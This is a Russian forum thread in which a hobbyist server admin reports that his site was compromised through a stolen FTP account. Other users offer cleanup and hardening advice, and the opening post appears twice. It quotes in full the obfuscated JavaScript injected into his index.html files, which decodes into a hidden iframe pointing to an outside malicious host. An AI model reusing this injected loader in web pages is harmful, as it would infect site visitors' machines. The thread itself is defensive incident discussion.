Закачали троян на сайт
Модераторы: SLEDopit, Модераторы разделов
-
Timur4ik
- Сообщения: 16
Закачали троян на сайт
Доброго всем времени суток. У меня хобби я администрирую виртуальный выделенный сервер(freebsd 6), на нем сайт и форум(некомерческий просто для меня и моих друзей), сам я какими то большими познаниями в администрировании не обладают(только панель управления и немного командная строка), это вступление а теперь по делу.
1) Вчера один из пользователей сайта обратил мое внимание на то что после авторизации на форуме (ipb), каспер пишит на троян в кэше IE. Проверил действительно C:\Documents and Settings\1\Local Settings\Temporary Internet Files\Content.IE5\DW4B1H45\index[6].htm\JavaScript.0 - инфицирован VBS.PackFor
2) Зашел по ssh под рутом на сервер. Вывел команду last.
*********************************************************
admin ftp 88.255.90.50 Mon Oct 22 07:02 - 07:23 (00:20)
admin ftp 88.255.90.50 Sat Oct 20 11:04 - 11:12 (00:07)
*******************************************************
admin ftp 88.255.90.50 Fri Oct 19 13:24 - 14:04 (00:40)
admin ftp 88.255.90.50 Wed Oct 17 05:34 - 06:12 (00:38)
admin ftp 88.255.90.50 Wed Oct 17 03:24 - 03:33 (00:09)
*********************************************************
Ip адреса с которых я вхожу мне всегда известны,с этого 88.255.90.50 я зайти не мог.
3) Решил посмотреть какие файлы были изменены, за 7 дней, сделал find . -type f -ctime -7
4) Команда вывела очень много файлов, все файлы это index.html. К содержимому файла в конце добавляеться следующая строка
<script>function v471c88610fbd9(v471c8861103fb){ function v471c886110c1b () {return 16;} return(parseInt(v471c8861103fb,v471c886110c1b()));}function v471c886111c5f(v471c8861124a3){ function v471c886113c9e () {return 2;} var v471c886112ca2='';for(v471c8861134c6=0; v471c8861134c6<v471c8861124a3.length; v471c8861134c6+=v471c886113c9e()){ v471c886112ca2+=(String.fromCharCode(v471c88610fbd9(v471c8861124a3.substr(v471c8
861134c6, v471c886113c9e()))));}return v471c886112ca2;} document.write(v471c886111c5f('3C696672616D65206E616D653D27616434663666356331633327207372633D27687474703A2F
2F766572796D6F6E6B65792E636F6D2F676F6F662F696E6465782E706870272077696474683D3134
3
8206865696768743D333133207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616
D
653E'));</script>@@
5) Что делать дальше я к сожалению не знаю. В ручную удалять из всех файлов этот код мне кажеться глупо и неудобно, но автоматизировать я не могу.
6) Что мне сделать после того как я все исправлю? Уже сделано закрыл доступ по ftp и ssh для пользователя admin, сменил пароль на admin, думаю сменить пароль на форуме и сменить пароль БД.
Большое спасибо что уделили мне время, я не администратор, это моё хобби и мне очень нужна ваша помощь.
P.S Не могу попасть в админку форума, по адресу http://forum.******.net/admin/index.php, открываеться пустая страница.
1) Вчера один из пользователей сайта обратил мое внимание на то что после авторизации на форуме (ipb), каспер пишит на троян в кэше IE. Проверил действительно C:\Documents and Settings\1\Local Settings\Temporary Internet Files\Content.IE5\DW4B1H45\index[6].htm\JavaScript.0 - инфицирован VBS.PackFor
2) Зашел по ssh под рутом на сервер. Вывел команду last.
*********************************************************
admin ftp 88.255.90.50 Mon Oct 22 07:02 - 07:23 (00:20)
admin ftp 88.255.90.50 Sat Oct 20 11:04 - 11:12 (00:07)
*******************************************************
admin ftp 88.255.90.50 Fri Oct 19 13:24 - 14:04 (00:40)
admin ftp 88.255.90.50 Wed Oct 17 05:34 - 06:12 (00:38)
admin ftp 88.255.90.50 Wed Oct 17 03:24 - 03:33 (00:09)
*********************************************************
Ip адреса с которых я вхожу мне всегда известны,с этого 88.255.90.50 я зайти не мог.
3) Решил посмотреть какие файлы были изменены, за 7 дней, сделал find . -type f -ctime -7
4) Команда вывела очень много файлов, все файлы это index.html. К содержимому файла в конце добавляеться следующая строка
<script>function v471c88610fbd9(v471c8861103fb){ function v471c886110c1b () {return 16;} return(parseInt(v471c8861103fb,v471c886110c1b()));}function v471c886111c5f(v471c8861124a3){ function v471c886113c9e () {return 2;} var v471c886112ca2='';for(v471c8861134c6=0; v471c8861134c6<v471c8861124a3.length; v471c8861134c6+=v471c886113c9e()){ v471c886112ca2+=(String.fromCharCode(v471c88610fbd9(v471c8861124a3.substr(v471c8
861134c6, v471c886113c9e()))));}return v471c886112ca2;} document.write(v471c886111c5f('3C696672616D65206E616D653D27616434663666356331633327207372633D27687474703A2F
2F766572796D6F6E6B65792E636F6D2F676F6F662F696E6465782E706870272077696474683D3134
3
8206865696768743D333133207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616
D
653E'));</script>@@
5) Что делать дальше я к сожалению не знаю. В ручную удалять из всех файлов этот код мне кажеться глупо и неудобно, но автоматизировать я не могу.
6) Что мне сделать после того как я все исправлю? Уже сделано закрыл доступ по ftp и ssh для пользователя admin, сменил пароль на admin, думаю сменить пароль на форуме и сменить пароль БД.
Большое спасибо что уделили мне время, я не администратор, это моё хобби и мне очень нужна ваша помощь.
P.S Не могу попасть в админку форума, по адресу http://forum.******.net/admin/index.php, открываеться пустая страница.
-
reinhard
- Сообщения: 86
- ОС: Fedora Core, FreeBSD
Re: Закачали троян на сайт
Если есть возможность, переставь форум.
Желательно перед этим удалить все содержимое, т.к. могли подсунуть *.php (или *.html) с бэкдором.
Базу можно оставить.
Пароль на admin желательно генерировать генерилкой.
В последущем - особое внимание логам.
Еще, на всякий случай, можно залить исходники системы в /usr/src и пересобрать и переставть ядро и мир.
Желательно перед этим удалить все содержимое, т.к. могли подсунуть *.php (или *.html) с бэкдором.
Базу можно оставить.
Пароль на admin желательно генерировать генерилкой.
В последущем - особое внимание логам.
Еще, на всякий случай, можно залить исходники системы в /usr/src и пересобрать и переставть ядро и мир.
-
Sandle_X
- Сообщения: 117
- ОС: Gentoo Base System
Re: Закачали троян на сайт
Надо было разрешить доступ по ssh только определенным IP, и убрать авторизацию по паролю, лучше использовать ключи...это что качается ssh...про ядро верно сказали...желательно проверить еще систему на руткиты...(rkhunter и т.п.), ну и желательно форум переставить...сказали верно.
/The information should be free.../ <Gentoo Base System version 1.12.10>
Конференция форума в Jabber: linuxforum@conference.jabber.ru
Конференция форума в Jabber: linuxforum@conference.jabber.ru
-
ivlad
- Сообщения: 57
- ОС: Mac OS X, Debian Linux
Re: Закачали троян на сайт
PGP Fingerprint: E82A 17D6 1DD4 9E08 66DD ADA7 59C6 A25B AC40 0D02
-
SatanClaus
- Сообщения: 24
-
TechnoMage
- Сообщения: 146
- Статус: анимешный злодей
- ОС: open SUSE 11
Re: Закачали троян на сайт
Форум обновить надо.
Форум то какой?
Кстати. Иногда вредоносный код пихают в базу.
Форум то какой?
Базу можно оставить.
Кстати. Иногда вредоносный код пихают в базу.
...баги в программе начали давать сбои... (из перевода манги Angel Sanctuary)
-
Timur4ik
- Сообщения: 16
Re: Закачали троян на сайт
Форум был ipb 2.2.1 поставил с нуля 2.3.1. Про вредоносный код в базе знаю, но рискнул и востановился из бекапа. Доступ для пользователя admin закрыл полностью и по ssh и по ftp. Через пару дней после смены пароля зафиксировал в логах попытку войти по ftp под пользователем admin, естественно безуспешную. Больше никакой активности замечено не было, но бдительность не теряю, открытым остался вопрос "Как сломали?" паблик уязвимостей по ipb 2.2.1 я не нашел.
-
ivlad
- Сообщения: 57
- ОС: Mac OS X, Debian Linux
Re: Закачали троян на сайт
В логи web-сервера на предмет injections не смотрели?
PGP Fingerprint: E82A 17D6 1DD4 9E08 66DD ADA7 59C6 A25B AC40 0D02
-
reinhard
- Сообщения: 86
- ОС: Fedora Core, FreeBSD
Re: Закачали троян на сайт
Timur4ik писал(а): ↑31.10.2007 16:43Через пару дней после смены пароля зафиксировал в логах попытку войти по ftp под пользователем admin, естественно безуспешную. Больше никакой активности замечено не было, но бдительность не теряю, открытым остался вопрос "Как сломали?" паблик уязвимостей по ipb 2.2.1 я не нашел.
Подбором паролей по ftp/ssh?
-
sapun
- Сообщения: 72
- ОС: FreeBSD 7.2, Kubuntu 9.04
Re: Закачали троян на сайт
Была аналогичная проблема! Как-то (скорее всего сперли пароль) сломали ftp, запихали на сайт троян и ссылок невидиых,,, На следующий день стуканули яндексу о торговле ссылками и сайт в бан,, я потом всё побил, пароли сменил и стали сайт из бана выводить...
-
TechnoMage
- Сообщения: 146
- Статус: анимешный злодей
- ОС: open SUSE 11
Re: Закачали троян на сайт
Форум был ipb 2.2.1 поставил с нуля 2.3.1. Про вредоносный код в базе знаю, но рискнул и востановился из бекапа. Доступ для пользователя admin закрыл полностью и по ssh и по ftp. Через пару дней после смены пароля зафиксировал в логах попытку войти по ftp под пользователем admin, естественно безуспешную. Больше никакой активности замечено не было, но бдительность не теряю, открытым остался вопрос "Как сломали?" паблик уязвимостей по ipb 2.2.1 я не нашел.
Ну не все полные скрипткиддисы.
У знакомых как то была похожая проблема. Правда им повезло. Там только слегка похулиганили. Все модеры оказались в бане.
...баги в программе начали давать сбои... (из перевода манги Angel Sanctuary)
-
Timur4ik
- Сообщения: 16
Re: Закачали троян на сайт
Логи просмотрел, ничего похожего на injection, по ftp подобрали тоже маловероятно(там пароль был 6цифир и 5 букв) или еще как вариант у меня в Тотал командере пароль был сохранен на фтп может троян подкинули на комп.
-
sapun
- Сообщения: 72
- ОС: FreeBSD 7.2, Kubuntu 9.04
Re: Закачали троян на сайт
Из тотала пароль легче лёгкого выдернуть! А расшифровать ещё легче! Насчёт своего случая я склоняюсь именно к тоталу! У меня несколько челов в офисе хранили там пароли - после инцедента отучил.
-
Grom
- Сообщения: 260
- ОС: Debian Etch, RHEL-5.4
Re: Закачали троян на сайт
По протоколку ftp логин и пароль передаются нешифрованными. Сниффером это все перехватывается очень легко.
Послужной список: Slackware-3.x, RedHat-4.x,5.x,6.x,7.x, FedoraCore-3, Debian Etch/Lenny
Осваиваю: RHEL-5.4
Осваиваю: RHEL-5.4
-
Timur4ik
- Сообщения: 16
Re: Закачали троян на сайт
Мне кажеться что злоумышленник не успокоился. В последнее время по логам заметил активность, подбирают пароль на ssh(подбирали и раньше но активность на порядок увеличилась). В аську стучался какой то, интересовался моим ботом(у меня висит icq бот на сервере), после в логах заметил что подбирают пароль к пользователю bot,boot, bots и т.д. В общем мне это порядком надоело, хочу перекинуть ssh на другой порт, вопрос как это сделать. Может повесить honeypot, прищучить подлеца 
-
VPF
- Сообщения: 1042
- Статус: форум покинул
- ОС: Mandriva,ClarkConnect,Windows
Re: Закачали троян на сайт
Timur4ik писал(а): ↑14.11.2007 10:26Мне кажеться что злоумышленник не успокоился. В последнее время по логам заметил активность, подбирают пароль на ssh(подбирали и раньше но активность на порядок увеличилась). В аську стучался какой то, интересовался моим ботом(у меня висит icq бот на сервере), после в логах заметил что подбирают пароль к пользователю bot,boot, bots и т.д. В общем мне это порядком надоело, хочу перекинуть ssh на другой порт, вопрос как это сделать. Может повесить honeypot, прищучить подлеца
Вот отчёт за последние сутки.
Это обычная ситуация.
3000001 - SSH Brute Force Attack
А ты надеешься, что тебя обойдут стороной?
Только надёжная защита поможет в современной действительности.
У вас нет необходимых прав для просмотра вложений в этом сообщении.
Think different www.vorko.info
-
pento
- Сообщения: 403
- ОС: Fedora 10
Re: Закачали троян на сайт
С большой долей вероятности из тотала взяли данные аккаунта. Проверяй виндовую тачку неа предмет "зла"
-
reinhard
- Сообщения: 86
- ОС: Fedora Core, FreeBSD
-
Timur4ik
- Сообщения: 16